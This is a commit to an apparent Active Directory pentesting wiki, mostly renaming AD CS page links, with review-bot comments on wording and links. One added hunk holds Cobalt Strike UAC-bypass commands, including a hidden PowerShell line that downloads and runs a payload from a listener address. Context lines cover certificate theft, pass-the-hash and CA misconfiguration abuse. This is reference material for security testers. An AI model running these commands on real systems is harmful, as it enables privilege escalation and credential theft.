GitBook: [#3451] No subject

This commit is contained in:
CPol 2022-09-03 00:24:33 +00:00 committed by gitbook-bot
parent 0437a86fff
commit f83a01bbfd
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
7 changed files with 24 additions and 20 deletions

View file

@ -157,10 +157,10 @@
* [Active Directory Methodology](windows-hardening/active-directory-methodology/README.md)
* [Abusing Active Directory ACLs/ACEs](windows-hardening/active-directory-methodology/acl-persistence-abuse.md)
* [AD Certificates](windows-hardening/active-directory-methodology/ad-certificates.md)
* [AD CS Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/ad-cs-account-persistence.md)
* [AD CS Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/ad-cs-domain-escalation.md)
* [AD CS Domain Persistence](windows-hardening/active-directory-methodology/ad-certificates/ad-cs-domain-persistence.md)
* [AD CS Certificate Theft](windows-hardening/active-directory-methodology/ad-certificates/ad-cs-certificate-theft.md)
* [AD CS Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md)
* [AD CS Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md)
* [AD CS Domain Persistence](windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md)
* [AD CS Certificate Theft](windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md)
* [AD information in printers](windows-hardening/active-directory-methodology/ad-information-in-printers.md)
* [ASREPRoast](windows-hardening/active-directory-methodology/asreproast.md)
* [BloodHound](windows-hardening/active-directory-methodology/bloodhound.md)
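Review bot: the four SUMMARY entries for the AD CS pages switch their targets from `ad-certificates/ad-cs-account-persistence.md` (and the three sibling `ad-cs-*.md` files) to `ad-certificates/account-persistence.md`, `domain-escalation.md`, `domain-persistence.md` and `certificate-theft.md`, which only works if those four files are moved in the same commit; the commit summary lists 7 changed files but the moves themselves are not visible in the hunks shown here, so please confirm the renames are included, otherwise the GitBook navigation breaks for all four pages. A grep for `ad-cs-` across the repository before merging would also catch any reference this commit missed.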

View file

@ -65,6 +65,10 @@ ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
rev2self # Stop using token generated with make_token
## The use of make_token generates event 4624: An account was successfully logged on. This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type. As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.
# UAC Bypass
elevate svc-exe <listener>
elevate uac-token-duplication <listener>
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
## Steal token from pid
## Like make_token but stealing the token from a process
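Review bot: the phrase "As mentioned above" in the new `##` comment under `rev2self` has no referent within this hunk; state the filter explicitly (Event ID 4624 with Logon Type 9, i.e. `LOGON32_LOGON_NEW_CREDENTIALS`) so the note stands on its own when read in the rendered page, since this is the one detection-relevant line added here. A single very long `##` comment line is also hard to read inside a code block; break it into two or three `##` lines, matching the short `## Steal token from pid` style used just below.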

View file

@ -281,16 +281,16 @@ Usually users will access the system via RDP, so here you have how to performa c
Gathering certificates from the compromised machine could be a way to escalate privileges inside the environment:
{% content-ref url="ad-certificates/ad-cs-certificate-theft.md" %}
[ad-cs-certificate-theft.md](ad-certificates/ad-cs-certificate-theft.md)
{% content-ref url="ad-certificates/certificate-theft.md" %}
[certificate-theft.md](ad-certificates/certificate-theft.md)
{% endcontent-ref %}
### Certificate Templates Abuse
If vulnerable templates are configured it's possible to abuse them to escalate privileges:
{% content-ref url="ad-certificates/ad-cs-domain-escalation.md" %}
[ad-cs-domain-escalation.md](ad-certificates/ad-cs-domain-escalation.md)
{% content-ref url="ad-certificates/domain-escalation.md" %}
[domain-escalation.md](ad-certificates/domain-escalation.md)
{% endcontent-ref %}
## Post-exploitation with high privilege account
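Review bot: the link labels in both `{% content-ref %}` blocks are bare filenames (`[certificate-theft.md](ad-certificates/certificate-theft.md)`, `[domain-escalation.md](ad-certificates/domain-escalation.md)`) and had to be edited alongside the URL; using the page titles as labels, in the same wording as the SUMMARY entries, would keep any future rename to a one-field change. The URL change itself matches the SUMMARY hunk in this commit.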
@ -352,16 +352,16 @@ These are like golden tickets forged in a way that **bypasses common golden tick
**Having certificates of an account or being able to request them** is a very good way to be able to persist in the users account (even if he changes the password):
{% content-ref url="ad-certificates/ad-cs-account-persistence.md" %}
[ad-cs-account-persistence.md](ad-certificates/ad-cs-account-persistence.md)
{% content-ref url="ad-certificates/account-persistence.md" %}
[account-persistence.md](ad-certificates/account-persistence.md)
{% endcontent-ref %}
### **Certificates Domain Persistence**
**Using certificates is also possible to persist with high privileges inside the domain:**
{% content-ref url="ad-certificates/ad-cs-domain-persistence.md" %}
[ad-cs-domain-persistence.md](ad-certificates/ad-cs-domain-persistence.md)
{% content-ref url="ad-certificates/domain-persistence.md" %}
[domain-persistence.md](ad-certificates/domain-persistence.md)
{% endcontent-ref %}
### AdminSDHolder Group
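Review bot: two wording issues sit in the lines surrounding the retargeted `{% content-ref %}` blocks and are worth fixing while this section is open: `persist in the users account (even if he changes the password)` should read `user's account (even if they change the password)`, and `**Using certificates is also possible to persist**` is missing its subject (`Using certificates it is also possible to persist`). The new targets `ad-certificates/account-persistence.md` and `ad-certificates/domain-persistence.md` are consistent with the SUMMARY change.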

View file

@ -49,7 +49,7 @@ Rubeus.exe asktgt /user:harmj0y /certificate:C:\Temp\cert.pfx /password:CertPass
```
{% hint style="warning" %}
Combined with the technique outlined in the [**THEFT5**](ad-cs-certificate-theft.md#ntlm-credential-theft-via-pkinit-theft5) section, an attacker can also persistently **obtain the accounts NTLM hash**, which the attacker could use to authenticate via **pass-the-hash** or **crack** to obtain the **plaintext** **password**. \
Combined with the technique outlined in the [**THEFT5**](certificate-theft.md#ntlm-credential-theft-via-pkinit-theft5) section, an attacker can also persistently **obtain the accounts NTLM hash**, which the attacker could use to authenticate via **pass-the-hash** or **crack** to obtain the **plaintext** **password**. \
This is an alternative method of **long-term credential theft** that does **not touch LSASS** and is possible from a **non-elevated context.**
{% endhint %}
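Review bot: the THEFT5 link changes only its file part, `ad-cs-certificate-theft.md` to `certificate-theft.md`, and keeps the fragment `#ntlm-credential-theft-via-pkinit-theft5`; GitBook derives that slug from the heading text of the target page, so the link is valid only if the heading in the renamed file is left untouched, which cannot be checked from this hunk. One style point in the same changed line: `obtain the accounts NTLM hash` should be `obtain the account's NTLM hash`.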
@ -57,7 +57,7 @@ This is an alternative method of **long-term credential theft** that does **not
If a certificate template allowed for **Domain Computers** as enrolment principals, an attacker could **enrol a compromised systems machine account**. The default **`Machine`** template matches all those characteristics.
If an **attacker elevates privileges** on compromised system, the attacker can use the **SYSTEM** account to enrol in certificate templates that grant enrolment privileges to machine accounts (more information in [**THEFT3**](ad-cs-certificate-theft.md#machine-certificate-theft-via-dpapi-theft3)).
If an **attacker elevates privileges** on compromised system, the attacker can use the **SYSTEM** account to enrol in certificate templates that grant enrolment privileges to machine accounts (more information in [**THEFT3**](certificate-theft.md#machine-certificate-theft-via-dpapi-theft3)).
You can use [**Certify**](https://github.com/GhostPack/Certify) **** to **** gather a certificate for the machine account elevating automatically to SYSTEM with:
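Review bot: the changed line `If an **attacker elevates privileges** on compromised system` is missing an article (`on a compromised system`), and the context line `[**Certify**](https://github.com/GhostPack/Certify) **** to **** gather` carries stray empty bold markers (`**** to ****`) that GitBook leaves behind and that render as literal asterisks in some viewers; both are cheap to fix while the line is being edited. The THEFT3 retargeting to `certificate-theft.md#machine-certificate-theft-via-dpapi-theft3` keeps its fragment unchanged, same caveat as the other anchor links in this commit.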

View file

@ -263,7 +263,7 @@ The two main rights here are the **`ManageCA`** right and the **`ManageCertifica
#### Abuse
If you have a principal with **`ManageCA`** rights on a **certificate authority**, we can use **PSPKI** to remotely flip the **`EDITF_ATTRIBUTESUBJECTALTNAME2`** bit to **allow SAN** specification in any template ([ECS6](ad-cs-domain-escalation.md#editf\_attributesubjectaltname2-esc6)):
If you have a principal with **`ManageCA`** rights on a **certificate authority**, we can use **PSPKI** to remotely flip the **`EDITF_ATTRIBUTESUBJECTALTNAME2`** bit to **allow SAN** specification in any template ([ECS6](domain-escalation.md#editf\_attributesubjectaltname2-esc6)):
<figure><img src="../../../.gitbook/assets/image (1) (2) (1).png" alt=""><figcaption></figcaption></figure>
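Review bot: the link label `ECS6` in the changed line is a typo for `ESC6`, which is what the fragment `#editf\_attributesubjectaltname2-esc6` and the technique's standard name use; since the line is being edited anyway, fix the label here. The sentence also switches person midway (`If you have a principal ... we can use PSPKI`); pick one.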
@ -390,8 +390,8 @@ Common **problems** with NTLM relay attacks are that the **NTLM sessions are usu
However, abusing a NTLM relay attack to obtain a certificate to the user solves this limitations, as the session will live as long as the certificate is valid and the certificate can be used to use services **enforcing NTLM signing**. To know how to use an stolen cert check:
{% content-ref url="ad-cs-account-persistence.md" %}
[ad-cs-account-persistence.md](ad-cs-account-persistence.md)
{% content-ref url="account-persistence.md" %}
[account-persistence.md](account-persistence.md)
{% endcontent-ref %}
Another limitation of NTLM relay attacks is that they **require a victim account to authenticate to an attacker-controlled machine**. An attacker could wait or could try to **force** it:
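Review bot: the `{% content-ref %}` target `account-persistence.md` has no `ad-certificates/` prefix while the README hunk in this commit uses one; that is correct only because this file lives in the same directory as the target, so please confirm the file's location and consider noting it in the commit message, since the two forms look inconsistent side by side. Grammar in the unchanged context line `However, abusing a NTLM relay attack ... solves this limitations ... how to use an stolen cert`: `an NTLM relay attack`, `solves these limitations`, `a stolen cert`.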

View file

@ -26,7 +26,7 @@ How can you tell that a certificate is a CA certificate?
* There are **no EKUs**
The built-in GUI supported way to **extract this certificate private key** is with `certsrv.msc` on the CA server.\
However, this certificate **isn't different** from other certificates stored in the system, so for example check the [**THEFT2 technique**](ad-cs-certificate-theft.md#user-certificate-theft-via-dpapi-theft2) to see how to **extract** them.
However, this certificate **isn't different** from other certificates stored in the system, so for example check the [**THEFT2 technique**](certificate-theft.md#user-certificate-theft-via-dpapi-theft2) to see how to **extract** them.
You can also get the cert and private key using [**certipy**](https://github.com/ly4k/Certipy):
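Review bot: this is the third file in the commit whose link depends on a heading slug in `certificate-theft.md` (`#user-certificate-theft-via-dpapi-theft2`) surviving the rename exactly as is; rather than checking each fragment by hand, run a markdown link checker once over `ad-certificates/` after the move and attach the result to the PR.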
@ -67,7 +67,7 @@ The specified certificate should **work with the previously detailed forgery met
## Malicious Misconfiguration - DPERSIST3
There is a myriad of opportunities for **persistence** via **security descriptor modifications of AD CS** components. Any scenario described in the “[Domain Escalation](ad-cs-domain-escalation.md)” section could be maliciously implemented by an attacker with elevated access, as well as addition of “control rights'' (i.e., WriteOwner/WriteDACL/etc.) to sensitive components. This includes:
There is a myriad of opportunities for **persistence** via **security descriptor modifications of AD CS** components. Any scenario described in the “[Domain Escalation](domain-escalation.md)” section could be maliciously implemented by an attacker with elevated access, as well as addition of “control rights'' (i.e., WriteOwner/WriteDACL/etc.) to sensitive components. This includes:
* **CA servers AD computer** object
* The **CA servers RPC/DCOM server**
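Review bot: the quotes around `“control rights''` in the changed line mix a curly opening double quote with two ASCII apostrophes as the closer; use a matching pair (plain `"control rights"` is fine). In the context bullets, `CA servers AD computer object` and `The CA servers RPC/DCOM server` need the possessive `CA server's`. The `[Domain Escalation](domain-escalation.md)` retargeting itself resolves within the same directory and is consistent with the rest of the commit.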